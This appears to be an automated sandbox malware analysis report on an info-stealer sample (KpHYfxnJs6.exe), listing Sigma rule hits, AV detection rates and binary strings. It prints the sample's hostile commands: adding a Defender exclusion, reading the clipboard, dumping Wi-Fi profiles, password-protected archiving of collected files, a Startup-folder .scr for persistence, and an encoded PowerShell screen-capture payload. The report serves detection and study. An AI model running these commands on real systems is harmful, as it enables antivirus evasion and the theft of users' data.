IAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBl
              Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\KpHYfxnJs6.exe", ParentImage: C:\Users\user\Desktop\KpHYfxnJs6.exe, ParentProcessId: 7732, ParentProcessName: KpHYfxnJs6.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 4280, ProcessName: cmd.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\KpHYfxnJs6.exe", ParentImage: C:\Users\user\Desktop\KpHYfxnJs6.exe, ParentProcessId: 7732, ParentProcessName: KpHYfxnJs6.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'", ProcessId: 7964, ProcessName: cmd.exe
              Sigma detected: SCR File Write Event
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\KpHYfxnJs6.exe, ProcessId: 7732, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr
              Sigma detected: Startup Folder File Write
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\KpHYfxnJs6.exe, ProcessId: 7732, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
              Sigma detected: Suspicious Execution of Powershell with Base64
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Suspicious Screensaver Binary File Creation
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\KpHYfxnJs6.exe, ProcessId: 7732, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr
              Sigma detected: Dynamic CSharp Compile Artefact
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7048, TargetFilename: C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline
              Sigma detected: Files Added To An Archive Using Rar.EXE
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6384, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *, ProcessId: 2792, ProcessName: rar.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7964, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe', ProcessId: 8108, ProcessName: powershell.exe

              Data Obfuscation

              barindex
              Sigma detected: Dot net compiler compiles file from suspicious location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBl

              Stealing of Sensitive Information

              barindex
              Sigma detected: Capture Wi-Fi password
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\KpHYfxnJs6.exe", ParentImage: C:\Users\user\Desktop\KpHYfxnJs6.exe, ParentProcessId: 7732, ParentProcessName: KpHYfxnJs6.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7492, ProcessName: cmd.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: KpHYfxnJs6.exeVirustotal: Detection: 43%Perma Link
              Source: KpHYfxnJs6.exeReversingLabs: Detection: 42%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: KpHYfxnJs6.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA3901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,109_2_00007FF6FAA3901C
              Source: KpHYfxnJs6.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2905394504.000000006F911000.00000020.00000001.01000000.00000007.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\python311.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2898642505.000000006C626000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.pdb source: powershell.exe, 00000046.00000002.2707327914.0000000004ACA000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: KpHYfxnJs6.exe, 00000004.00000002.2897142653.000000006C0A3000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdbOO source: KpHYfxnJs6.exe, 00000004.00000002.2903601786.000000006F8DB000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_bz2.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2903162092.000000006F8A1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2896773038.000000006BEE2000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdbAA source: KpHYfxnJs6.exe, 00000004.00000002.2896773038.000000006BEE2000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\select.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2901778919.000000006F851000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_ssl.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2901169725.000000006F821000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_ctypes.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2904571313.000000006F8F1000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_hashlib.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2900426461.000000006F811000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2903601786.000000006F8DB000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_queue.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2900045891.000000006F801000.00000040.00000001.01000000.00000014.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2895977031.000000006BE70000.00000040.00000001.01000000.00000015.sdmp
